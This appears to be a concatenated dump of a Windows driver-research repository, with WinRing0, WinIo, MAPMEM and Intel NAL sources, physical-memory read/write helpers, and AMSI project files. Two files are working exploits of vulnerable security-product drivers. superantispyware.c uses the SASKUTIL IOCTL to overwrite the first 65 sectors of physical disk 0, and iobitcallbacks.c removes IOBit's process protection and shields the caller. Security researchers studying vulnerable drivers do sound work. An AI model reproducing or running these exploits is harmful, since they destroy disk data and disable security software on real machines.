23 | #define OLS_DLL_DRIVER_NOT_LOADED_ON_NETWORK 5
24 | #define OLS_DLL_UNKNOWN_ERROR 9
25 |
26 | //-----------------------------------------------------------------------------
27 | //
28 | // Driver Type
29 | //
30 | //-----------------------------------------------------------------------------
31 |
32 | #define OLS_DRIVER_TYPE_UNKNOWN 0
33 | #define OLS_DRIVER_TYPE_WIN_9X 1
34 | #define OLS_DRIVER_TYPE_WIN_NT 2
35 | #define OLS_DRIVER_TYPE_WIN_NT4 3 // Obsolete
36 | #define OLS_DRIVER_TYPE_WIN_NT_X64 4
37 | #define OLS_DRIVER_TYPE_WIN_NT_IA64 5 // Reseved
38 |
39 | //-----------------------------------------------------------------------------
40 | //
41 | // PCI Error Code
42 | //
43 | //-----------------------------------------------------------------------------
44 |
45 | #define OLS_ERROR_PCI_BUS_NOT_EXIST (0xE0000001L)
46 | #define OLS_ERROR_PCI_NO_DEVICE (0xE0000002L)
47 | #define OLS_ERROR_PCI_WRITE_CONFIG (0xE0000003L)
48 | #define OLS_ERROR_PCI_READ_CONFIG (0xE0000004L)
49 |
50 | //-----------------------------------------------------------------------------
51 | //
52 | // Support Macros
53 | //
54 | //-----------------------------------------------------------------------------
55 |
56 | // Bus Number, Device Number and Function Number to PCI Device Address
57 | #define PciBusDevFunc(Bus, Dev, Func) ((Bus&0xFF)<<8) | ((Dev&0x1F)<<3) | (Func&7)
58 | // PCI Device Address to Bus Number
59 | #define PciGetBus(address) ((address>>8) & 0xFF)
60 | // PCI Device Address to Device Number
61 | #define PciGetDev(address) ((address>>3) & 0x1F)
62 | // PCI Device Address to Function Number
63 | #define PciGetFunc(address) (address&7)
64 |
--------------------------------------------------------------------------------
/source/SecTrash/superantispyware.c:
--------------------------------------------------------------------------------
1 | #pragma warning(disable: 4005)
2 |
3 | #include
4 | #include
5 | #include
6 | #include "ntos.h"
7 |
8 | NTSTATUS CallDriver(
9 | _In_ HANDLE DeviceHandle,
10 | _In_ ULONG IoControlCode,
11 | _In_opt_ PVOID InputBuffer,
12 | _In_opt_ ULONG InputBufferLength,
13 | _In_opt_ PVOID OutputBuffer,
14 | _In_opt_ ULONG OutputBufferLength)
15 | {
16 | BOOL bResult = FALSE;
17 | IO_STATUS_BLOCK ioStatus;
18 |
19 | return NtDeviceIoControlFile(DeviceHandle,
20 | NULL,
21 | NULL,
22 | NULL,
23 | &ioStatus,
24 | IoControlCode,
25 | InputBuffer,
26 | InputBufferLength,
27 | OutputBuffer,
28 | OutputBufferLength);
29 |
30 | }
31 |
32 | #pragma pack(push, 1)
33 | typedef struct _CALL_DRV {
34 | WCHAR DeviceName[2048];
35 | LARGE_INTEGER StartingOffset; // +0x1000
36 | SIZE_T DataSize; // +0x1008
37 | PVOID DataPtr; // +0x1010
38 | } CALL_DRV, * PCALL_DRV;
39 | #pragma pack(pop)
40 |
41 | ULONG u = FIELD_OFFSET(CALL_DRV, DataPtr);
42 |
43 | #define SAS_DEVICE 0x9C40
44 | #define IOCTL_SAS_CALLDRIVER CTL_CODE(SAS_DEVICE, 0x850, METHOD_BUFFERED, FILE_ANY_ACCESS)
45 |
46 | int main()
47 | {
48 | NTSTATUS ntStatus;
49 | CALL_DRV request;
50 |
51 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\SASKUTIL"),
52 | GENERIC_READ | GENERIC_WRITE,
53 | 0,
54 | NULL,
55 | OPEN_EXISTING,
56 | 0,
57 | NULL);
58 |
59 | if (deviceHandle == INVALID_HANDLE_VALUE) {
60 | printf_s("[!] Unable to open device\r\n");
61 | #ifndef _DEBUG
62 | return -1;
63 | #endif
64 | }
65 | else {
66 | printf_s("[+] SASKUTIL device opened\r\n");
67 | }
68 |
69 | system("pause");
70 |
71 | WCHAR writeData[512];
72 |
73 | memset(&writeData, 0xAB, sizeof(writeData));
74 | RtlSecureZeroMemory(&request, sizeof(request));
75 |
76 | wcscpy_s(request.DeviceName, L"\\Device\\Harddisk0\\DR0");
77 | request.DataSize = sizeof(writeData);
78 | request.DataPtr = &writeData;
79 |
80 | for (ULONG i = 0; i < 65; i++) {
81 |
82 | request.StartingOffset.LowPart = (i * 512);
83 |
84 | ntStatus = CallDriver(deviceHandle,
85 | IOCTL_SAS_CALLDRIVER,
86 | &request,
87 | sizeof(CALL_DRV),
88 | NULL,
89 | 0);
90 |
91 | printf_s("[+] CallDriver NTSTATUS 0x%lX\r\n", ntStatus);
92 | }
93 |
94 | CloseHandle(deviceHandle);
95 | }
96 |
--------------------------------------------------------------------------------
/source/IntelNal/inc/linux/linuxdriverdevice_i.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Intel QV Linux kernel driver
3 | * Copyright (c) 1999 - 2013, Intel Corporation.
4 | *
5 | * This program is free software; you can redistribute it and/or modify it
6 | * under the terms and conditions of the GNU General Public License,
7 | * version 2, as published by the Free Software Foundation.
8 | *
9 | * This program is distributed in the hope it will be useful, but WITHOUT
10 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
11 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
12 | * more details.
13 | *
14 | * You should have received a copy of the GNU General Public License along with
15 | * this program; if not, write to the Free Software Foundation, Inc.,
16 | * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
17 | *
18 | */
19 |
20 | /*
21 | * Module Name:
22 | * linuxdriverdevice_i.h
23 | *
24 | * Abstract:
25 | * This file contains Linux Specific OS functions that are required
26 | * to correctly communicate with a device in Linux.
27 | */
28 |
29 |
30 | #ifndef _LINUXDRIVERDEVICE_I_H_
31 | #define _LINUXDRIVERDEVICE_I_H_
32 |
33 | #include
34 | #include
35 |
36 | BOOLEAN
37 | _NalMarkAdapterInUse(
38 | IN NAL_DEVICE_LOCATION NalDevice,
39 | IN BOOLEAN Lock
40 | );
41 |
42 | typedef struct _NAL_OS_SPECIFIC_DEVICE
43 | {
44 | UINT32 ReferenceCount;
45 | } NAL_OS_SPECIFIC_DEVICE;
46 |
47 | #define _NalReadPortOs8(a,p) NalReadPort8(p)
48 | #define _NalReadPortOs16(a,p) NalReadPort16(p)
49 | #define _NalReadPortOs32(a,p) NalReadPort32(p)
50 | #define _NalWritePortOs8(a,p,v) NalWritePort8(p,v)
51 | #define _NalWritePortOs16(a,p,v) NalWritePort16(p,v)
52 | #define _NalWritePortOs32(a,p,v) NalWritePort32(p,v)
53 | #define _NalReadRegisterOs8(a,d) NalReadRegister8(d)
54 | #define _NalReadRegisterOs16(a,d) NalReadRegister16(d)
55 | #define _NalReadRegisterOs32(a,d) NalReadRegister32(d)
56 | #define _NalWriteRegisterOs8(a,d,v) NalWriteRegister8(d,v)
57 | #define _NalWriteRegisterOs16(a,d,v) NalWriteRegister16(d,v)
58 | #define _NalWriteRegisterOs32(a,d,v) NalWriteRegister32(d,v)
59 |
60 | KVOID*
61 | _NalAllocateMemoryNonPagedPci(
62 | IN KVOID* PDev,
63 | IN UINT32 ByteCount,
64 | IN UINT32 Alignment,
65 | OUT NAL_PHYSICAL_ADDRESS* PhysicalAddress,
66 | IN CHAR* NamedLocator,
67 | IN UINT32 LineNumber
68 | );
69 |
70 | VOID
71 | NalFreeMemoryNonPagedPci(
72 | IN KVOID* PDev,
73 | IN KVOID* Address,
74 | IN NAL_PHYSICAL_ADDRESS PhysicalAddress,
75 | IN UINT32 Size
76 | );
77 |
78 | #endif
79 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/MAPMEM/README.TXT:
--------------------------------------------------------------------------------
1 | Build & Run Instructions:
2 | -------------------------
3 |
4 | The MAPMEM sample demonstrates how a kernel-mode device driver
5 | can utilize the Zw*MapViewOfSection APIs to (un)map a physical
6 | address into a user-mode process's address space.
7 |
8 |
9 | NOTE: Microsoft does not recommend architecting Win32 applications
10 | such that they read/write directly on physical memory.
11 | User-mode applications are not considered "trusted" parts
12 | of the system, and giving hardware access to untrusted
13 | modules seriously impairs system security.
14 |
15 | We encourage developers who need hardware access to locate
16 | their hardware I/O code in a device driver, and have their
17 | Win32 app communicate it's requests to the driver via the
18 | DeviceIoControl() API.
19 |
20 |
21 | This sample is composed of two parts, a Windows NT kernel-mode
22 | device driver (MAPMEM) and a Win32 test application (MAPTEST).
23 |
24 |
25 | The Win32 portion contains a file, MAPTEST.C, which attempts to
26 | obtain a handle to MAPMEM & send it IOCTLs. The executable is built
27 | using the Windows NT SDK. First update the environment and path by
28 | running \setenv.bat. Then change to the directory where
29 | you have the C source code and the makefile. Type "nmake /f maptest.mak"
30 | to compile the Win32 program, MAPTEST.EXE.
31 |
32 |
33 | The kernel driver portion contains the driver source code, MAPMEM.C
34 | and a text file used to configure your registry so that the driver
35 | can be loaded. The driver is built using the Windows NT DDK.
36 |
37 | To build the driver:
38 |
39 |
40 | 1. Assuming you have run \setenv.bat and
41 | \setenv.bat, build the driver by typing:
42 |
43 | build -cef
44 |
45 | (If there are any errors have a look at the build.log, build.err,
46 | and build.wrn files to get an idea of what went wrong.)
47 |
48 |
49 | 2. Copy the newly built driver, \lib\*\MAPMEM.SYS to the
50 | \system32\drivers\ directory, i.e.:
51 |
52 | copy \ntddk\lib\i386\free\mapmem.sys c:\winnt\system32\drivers\
53 |
54 |
55 | 3. Update the registry by running regini.exe on the mapmem.ini
56 | file, i.e.:
57 |
58 | regini mapmem.ini
59 |
60 | This adds a MAPMEM driver key under the HKEY_LOCAL_MACHINE\
61 | SYSTEM\CurrentControlSet\Services tree in the registry. You
62 | can verify this by starting REGEDIT.EXE and looking in the
63 | appropriate place.
64 |
65 |
66 | 4. Reboot.
67 |
68 |
69 | 5. Type:
70 |
71 | net start mapmem
72 |
73 | ...and then execute MAPTEST.EXE.
74 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/vxd/Makefile:
--------------------------------------------------------------------------------
1 | #-----------------------------------------------------------------------------
2 | # Author : hiyohiyo
3 | # Mail : hiyohiyo@crystalmark.info
4 | # Web : http://openlibsys.org/
5 | # License : The modified BSD license
6 | #
7 | # Copyright 2007 hiyohiyo, All rights reserved.
8 | #-----------------------------------------------------------------------------
9 | #
10 | # How to build on Windows XP SP1 DDK (Win Me Free Build Environment)
11 | #
12 | # 0. Get Windows XP SP1 DDK from MSDN
13 | # 1. Install Windows XP SP1 DDK with Win Me support
14 | # 2. Open "Win Me Free Build Environment"
15 | # 3. cd (WinRing0)\source\dll\vxd
16 | # 4. nmake
17 | #
18 | # Compile Options
19 | #_OPEN_LIB_SYS=
20 |
21 | !ifdef _OPEN_LIB_SYS
22 | VXDFILE = OpenLibSys.vxd
23 | !else
24 | VXDFILE = WinRing0.vxd
25 | !endif
26 |
27 | OBJDIR = bin
28 | VXDWRAPSDIR = $(DDKROOT)\lib\win_me\
29 |
30 | RC16 = $(DDKROOT)\bin\win_me\bin16\rc
31 | ML = $(DDKROOT)\bin\win_me\bin\ml
32 | CL = $(DDKROOT)\bin\x86\cl
33 | LINK = $(DDKROOT)\bin\x86\link
34 |
35 | !ifdef DEBUG
36 | DDEBUG =-DDEBLEVEL=1 -DDEBUG
37 | !else
38 | DDEBUG =-DDEBLEVEL=0
39 | !endif
40 |
41 | CFLAGS = -Zdp -Gs -c -DIS_32 $(DDEBUG)
42 | LFLAGS = -machine:i386 -debug:none kernel32.lib
43 | AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -Zd -c -Cx -DMASM6
44 |
45 | all: direxist $(OBJDIR)\OpenLS.vxd
46 |
47 | direxist:
48 | if not exist $(OBJDIR)\nul md $(OBJDIR)
49 |
50 | $(OBJDIR)\OpenLS.res: OpenLS.rc
51 | $(RC16) -Fo$@ -r OpenLS.rc
52 |
53 | $(OBJDIR)\OpenLS.obj: OpenLS.c
54 | $(CL) $(CFLAGS) -Fo$@ %s
55 |
56 | $(OBJDIR)\ctrl.obj: ctrl.asm
57 | $(ML) $(AFLAGS) -Fo$@ %s
58 |
59 | $(OBJDIR)\OpenLS.vxd: $(OBJDIR)\OpenLS.obj $(OBJDIR)\ctrl.obj\
60 | $(OBJDIR)\OpenLS.res OpenLS.def
61 | echo >NUL @<
9 | #include
10 | #include "phys32.h"
11 | #include "..\drv\winio_nt.h"
12 | #include "winio.h"
13 |
14 |
15 | PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct)
16 | {
17 | PBYTE pbLinAddr = NULL;
18 | DWORD dwBytesReturned;
19 |
20 | if (!IsWinIoInitialized)
21 | return false;
22 |
23 | if (!DeviceIoControl(hDriver, IOCTL_WINIO_MAPPHYSTOLIN, &PhysStruct,
24 | sizeof(tagPhysStruct), &PhysStruct, sizeof(tagPhysStruct),
25 | &dwBytesReturned, NULL))
26 | {
27 | return NULL;
28 | }
29 |
30 | return (PBYTE)PhysStruct.pvPhysMemLin;
31 | }
32 |
33 |
34 | bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct)
35 | {
36 | DWORD dwBytesReturned;
37 |
38 | if (!IsWinIoInitialized)
39 | {
40 | return false;
41 | }
42 |
43 | if (!DeviceIoControl(hDriver, IOCTL_WINIO_UNMAPPHYSADDR, &PhysStruct,
44 | sizeof(tagPhysStruct), NULL, 0, &dwBytesReturned, NULL))
45 | {
46 | return false;
47 | }
48 |
49 | return true;
50 | }
51 |
52 | // Support functions
53 |
54 | bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal)
55 | {
56 | PDWORD pdwLinAddr;
57 | tagPhysStruct PhysStruct;
58 |
59 | if (!IsWinIoInitialized)
60 | return false;
61 |
62 | if (g_Is64BitOS)
63 | {
64 | PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr;
65 | }
66 | else
67 | {
68 | // Avoid sign extension issues
69 | PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr;
70 | }
71 |
72 | PhysStruct.dwPhysMemSizeInBytes = 4;
73 |
74 | pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct);
75 |
76 | if (pdwLinAddr == NULL)
77 | return false;
78 |
79 | *pdwPhysVal = *pdwLinAddr;
80 |
81 | UnmapPhysicalMemory(PhysStruct);
82 |
83 | return true;
84 | }
85 |
86 |
87 | bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal)
88 | {
89 | PDWORD pdwLinAddr;
90 | tagPhysStruct PhysStruct;
91 |
92 | if (!IsWinIoInitialized)
93 | return false;
94 |
95 | if (g_Is64BitOS)
96 | {
97 | PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr;
98 | }
99 | else
100 | {
101 | // Avoid sign extension issues
102 | PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr;
103 | }
104 |
105 | PhysStruct.dwPhysMemSizeInBytes = 4;
106 |
107 | pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct);
108 |
109 | if (pdwLinAddr == NULL)
110 | return false;
111 |
112 | *pdwLinAddr = dwPhysVal;
113 |
114 | UnmapPhysicalMemory(PhysStruct);
115 |
116 | return true;
117 | }
118 |
--------------------------------------------------------------------------------
/source/SecTrash/iobitcallbacks.c:
--------------------------------------------------------------------------------
1 | #pragma warning(disable: 4005)
2 |
3 | #include
4 | #include
5 | #include
6 | #include "ntos.h"
7 |
8 | NTSTATUS CallDriver(
9 | _In_ HANDLE DeviceHandle,
10 | _In_ ULONG IoControlCode,
11 | _In_opt_ PVOID InputBuffer,
12 | _In_opt_ ULONG InputBufferLength,
13 | _In_opt_ PVOID OutputBuffer,
14 | _In_opt_ ULONG OutputBufferLength)
15 | {
16 | BOOL bResult = FALSE;
17 | IO_STATUS_BLOCK ioStatus;
18 |
19 | return NtDeviceIoControlFile(DeviceHandle,
20 | NULL,
21 | NULL,
22 | NULL,
23 | &ioStatus,
24 | IoControlCode,
25 | InputBuffer,
26 | InputBufferLength,
27 | OutputBuffer,
28 | OutputBufferLength);
29 |
30 | }
31 |
32 | typedef struct _CALL_DRV {
33 | ULONG Value1;
34 | ULONG Value2;
35 | HANDLE Pid1;
36 | HANDLE Pid2;
37 | BYTE Spare[392];
38 | } CALL_DRV, * PCALL_DRV;
39 |
40 | int main()
41 | {
42 | NTSTATUS ntStatus;
43 |
44 | HANDLE deviceHandle = CreateFile(TEXT("\\\\.\\ImfObCallback"),
45 | GENERIC_READ | GENERIC_WRITE,
46 | 0,
47 | NULL,
48 | OPEN_EXISTING,
49 | 0,
50 | NULL);
51 |
52 | if (deviceHandle == INVALID_HANDLE_VALUE) {
53 | printf_s("[!] Unable to open device\r\n");
54 | #ifndef _DEBUG
55 | return -1;
56 | #endif
57 | }
58 | else {
59 | printf_s("[+] ImfObCallback device opened\r\n");
60 | }
61 |
62 | //
63 | // Remove protection from IOBit processes.
64 | // IMF.exe
65 | // IMFCore.exe
66 | //
67 |
68 | ntStatus = CallDriver(deviceHandle,
69 | 0x22200C,
70 | NULL,
71 | 0,
72 | NULL,
73 | 0);
74 |
75 | if (NT_SUCCESS(ntStatus)) {
76 | printf_s("[~] Protection removed\r\n");
77 | }
78 | else {
79 | printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus);
80 | }
81 |
82 | system("pause");
83 |
84 | //
85 | // Protect ourself.
86 | //
87 |
88 | CALL_DRV request;
89 | DWORD procId1 = GetCurrentProcessId(), procId2;
90 |
91 | GetWindowThreadProcessId(GetDesktopWindow(), &procId2); //anything else
92 |
93 | RtlZeroMemory(&request, sizeof(request));
94 |
95 | request.Pid1 = UlongToHandle(procId1);
96 | request.Pid2 = UlongToHandle(procId2);
97 |
98 | ntStatus = CallDriver(deviceHandle,
99 | 0x222008,
100 | &request,
101 | sizeof(request),
102 | NULL,
103 | 0);
104 |
105 | if (NT_SUCCESS(ntStatus)) {
106 | printf_s("[~] Protection installed, try to kill me\r\n");
107 | }
108 | else {
109 | printf_s("[~] Error (NTSTATUS 0x%lx)\r\n", ntStatus);
110 | }
111 |
112 | system("pause");
113 |
114 | CloseHandle(deviceHandle);
115 | }
116 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiScan.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 | {58d1c9d3-a7e5-4f1a-b441-007441745fe5}
18 | False
19 |
20 |
21 |
22 |
23 | Source Files
24 |
25 |
26 | Source Files
27 |
28 |
29 | Source Files
30 |
31 |
32 | Generated Files
33 |
34 |
35 | Source Files
36 |
37 |
38 |
39 |
40 | Header Files
41 |
42 |
43 | Header Files
44 |
45 |
46 | Header Files
47 |
48 |
49 | Header Files
50 |
51 |
52 | Generated Files
53 |
54 |
55 | Header Files
56 |
57 |
58 |
59 |
60 | Resource Files
61 |
62 |
63 |
64 |
65 | Resource Files
66 |
67 |
68 | Source Files
69 |
70 |
71 | Resource Files
72 |
73 |
74 |
75 |
76 | Source Files
77 |
78 |
79 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiScan.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.136
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanServer", "AmsiServer\AmsiScan\AmsiScan.vcxproj", "{D131A205-F090-4CF5-8441-32074FE5398E}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiScanPS", "AmsiServer\AmsiScanPS\AmsiScanPS.vcxproj", "{19E4CA54-321F-481D-A457-48C4E3F3E85C}"
9 | ProjectSection(ProjectDependencies) = postProject
10 | {D131A205-F090-4CF5-8441-32074FE5398E} = {D131A205-F090-4CF5-8441-32074FE5398E}
11 | EndProjectSection
12 | EndProject
13 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AmsiClient", "AmsiClient\AmsiClient.vcxproj", "{CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}"
14 | EndProject
15 | Global
16 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
17 | Debug|x64 = Debug|x64
18 | Debug|x86 = Debug|x86
19 | Release|x64 = Release|x64
20 | Release|x86 = Release|x86
21 | EndGlobalSection
22 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
23 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.ActiveCfg = Debug|x64
24 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x64.Build.0 = Debug|x64
25 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.ActiveCfg = Debug|Win32
26 | {D131A205-F090-4CF5-8441-32074FE5398E}.Debug|x86.Build.0 = Debug|Win32
27 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.ActiveCfg = Release|x64
28 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x64.Build.0 = Release|x64
29 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.ActiveCfg = Release|Win32
30 | {D131A205-F090-4CF5-8441-32074FE5398E}.Release|x86.Build.0 = Release|Win32
31 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x64.ActiveCfg = Debug|x64
32 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Debug|x86.ActiveCfg = Debug|Win32
33 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x64.ActiveCfg = Release|x64
34 | {19E4CA54-321F-481D-A457-48C4E3F3E85C}.Release|x86.ActiveCfg = Release|Win32
35 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.ActiveCfg = Debug|x64
36 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x64.Build.0 = Debug|x64
37 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.ActiveCfg = Debug|Win32
38 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Debug|x86.Build.0 = Debug|Win32
39 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.ActiveCfg = Release|x64
40 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x64.Build.0 = Release|x64
41 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.ActiveCfg = Release|Win32
42 | {CDEC113D-ECE3-4F4B-B3FE-01C5E085DA99}.Release|x86.Build.0 = Release|Win32
43 | EndGlobalSection
44 | GlobalSection(SolutionProperties) = preSolution
45 | HideSolutionNode = FALSE
46 | EndGlobalSection
47 | GlobalSection(ExtensibilityGlobals) = postSolution
48 | SolutionGuid = {C3FB4B87-8F9C-4BDC-BE98-48B9ACE36E15}
49 | EndGlobalSection
50 | EndGlobal
51 |
--------------------------------------------------------------------------------